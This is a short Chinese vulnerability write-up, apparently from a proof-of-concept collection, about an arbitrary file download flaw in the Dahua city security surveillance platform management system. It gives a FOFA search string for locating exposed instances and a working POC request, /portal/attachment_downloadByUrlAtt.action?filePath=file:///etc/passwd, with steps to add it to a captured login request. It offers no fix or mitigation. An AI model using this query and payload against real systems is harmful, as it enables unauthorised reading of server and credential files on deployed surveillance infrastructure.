大华城市安防监控系统平台管理存在任意文件下载漏洞

大华城市安防监控系统平台管理存在任意文件下载漏洞

1.大华城市安防监控系统平台管理存在任意文件下载漏洞

1.1.漏洞描述

  大华城市安防监控系统平台管理存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件。

1.2.漏洞影响

  大华城市安防监控系统平台管理

1.3.FOFA

  “attachment_downloadByUrlAtt.action”

2.漏洞复现

2.1.登录页面

2.2.抓包

  刷新登录页面进行抓包，然后在数据包中添加POC。

POC：/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd